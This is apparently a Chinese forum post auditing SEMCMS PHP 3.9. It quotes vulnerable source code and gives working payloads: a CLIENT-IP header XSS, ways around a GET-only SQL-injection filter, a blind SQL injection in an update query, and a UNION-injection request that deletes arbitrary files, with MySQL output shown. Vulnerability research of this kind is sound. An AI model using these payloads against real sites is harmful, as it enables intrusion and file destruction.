semcms代码审计

XSS

漏洞代码
CaMtfK_Admin/SEMCMS_Top.php 71行

 function getRealIp(){
  
    $ip=FALSE;
    if(!empty($_SERVER["HTTP_CLIENT_IP"])){
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
        if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
        for ($i = 0; $i < count($ips); $i++) {
            if (!eregi ("/^(10│172.16│192.168)./i", $ips[$i])) {
                $ip = $ips[$i];
                break;
            }
        }
    }
    return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}

payload

http://127.0.0.1/SEMCMS_PHP_3.9/CaMtfK_Admin/SEMCMS_Top.php
请求头
CLIENT-IP: <script>alert(1)</script>

SQLi

if (isset($_GET)){$GetArray=$_GET;}else{$GetArray='';} //get
 
foreach ($GetArray as $value){ //get
    
    verify_str($value);
  
}

function inject_check_sql($sql_str) {
  
     return preg_match('/select|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
} 

function verify_str($str) { 
 
   if(inject_check_sql($str)) {
   
       exit('Sorry,You do this is wrong! (.-.)');
    } 
 
    return $str; 
} 
  • 过滤只过滤了GET,没有过滤POST
  • 如果支持堆叠查询的话,用预编译prepare、handler、show也可以注
  • 并且这个cms有很多地方,都是没有用单引号闭合的,数字型的SQL注入,或者万能密码

SEMCMS_Function.php 858行

}elseif ($CF=="fenpei"){ 
    
        $area_arr = $_POST["ID"]; //刚开始在这里被坑了,大写的ID
        $uid=$_POST['uid'];

           if ($area_arr==""){

                header("Location:SEMCMS_User.php?err=005");  

           }else{

                $area_arr = implode(",",$area_arr); //接收到数据用,链接
                $db_conn->query("update sc_user set user_qx='$area_arr' where ID=$uid");
                header("Location:SEMCMS_User.php?&err=001");   

            }

重点在这

$db_conn->query("update sc_user set user_qx='$area_arr' where ID=$uid"); $uid直接带入到了update语句中。

SEMCMS_Function.php里面有个$Ant=new AntDateProcess(); 这个类在contorl.php下,所以需要找一个文件把SEMCMS_Function.php和contorl.php两个文件联系起来,

SEMCMS_Top_include.php

<?php
include_once './Include/inc.php';
include_once 'SEMCMS_Function.php';

Include/inc.php

<?php
ob_start();
include_once '../Include/db_conn.php';
include_once '../Include/contorl.php';
include_once  'function.php';

验证


看网络延时

任意文件删除

这个删除文件的代码写的就有问题,就差找到一个可控点

xxx_Admin/Include/function.php

function Delfile($filename){

  if(file_exists($filename)){
    unlink($filename);
    }
   $filename=str_replace("prdoucts/", "prdoucts/small/", $filename);
  if(file_exists($filename)){
    unlink($filename);
    }
 }

有三个地方调用了他


变量都是从数据库过来的,跟进

看第一个删除调用 Function.php 475行

          case 'Deleted':
      
           if ($area_arr==""){

                header("Location:SEMCMS_Banner.php?lgid=".$languageID."&err=004"); 

             }else{

              //删除图片
               $query=$db_conn->query("select * from sc_banner WHERE ID in ($area_arr)");
               while($row=mysqli_fetch_array($query)){
                    Delfile($row['banner_image']);
                 }

需要控制CF Class这两个变量才能走到这里

CF Class,这两个变量都是从前端传过来的,都可控。

$area_arr = array();
 
if (isset($_GET["Class"])){$Class = $_GET["Class"];}else{$Class="";}
if (isset($_GET["CF"])){$CF = $_GET["CF"];}else{$CF="";}
。。。。
if (isset($_POST["AID"])){$area_arr = $_POST["AID"];$area_arr = implode(",",$area_arr);//用特定的字符把数组连成字符串

闭合SQL

从数据库中获取到的数据是 banner_image,他在banner表中的第二列,所以控制union的第二列是要删除的文件名,就可以。

mysql> select * from sc_banner where ID in (66) union select 1,2,3,4,5,6,7;
+----+--------------+------------+---------------+------------+-------------+--------------+
| ID | banner_image | banner_url | banner_fenlei | languageID | banner_time | banner_paixu |
+----+--------------+------------+---------------+------------+-------------+--------------+
|  1 | 2            | 3          | 4             |          5 | 6           |            7 |
+----+--------------+------------+---------------+------------+-------------+--------------+
1 row in set (0.00 sec)



mysql> select * from sc_banner where ID in (66) union select 1,0x312e747874,3,4,5,6,7;
+----+--------------+------------+---------------+------------+-------------+--------------+
| ID | banner_image | banner_url | banner_fenlei | languageID | banner_time | banner_paixu |
+----+--------------+------------+---------------+------------+-------------+--------------+
|  1 | 1.txt     | 3          | 4             |          5 | 6           |            7 |
+----+--------------+------------+---------------+------------+-------------+--------------+
1 row in set (0.00 sec)

在Admin目录下新建一个1.txt文件


1.txt 16进制编码一下 ==> 0x312e747874 这个文件的相对路径要根据SEMCMS_Top_include.php来判断,不是相对function.php的路径。

payload

http://127.0.0.1/SEMCMS_PHP_3.9/CaMtfK_Admin/SEMCMS_Top_include.php?CF=banner&Class=Deleted

post
AID[0]=66) union select 1,0x312e747874,3,4,5,6,7%23

结果,1.txt已经没了

  • 通过
  • 未通过

0 投票者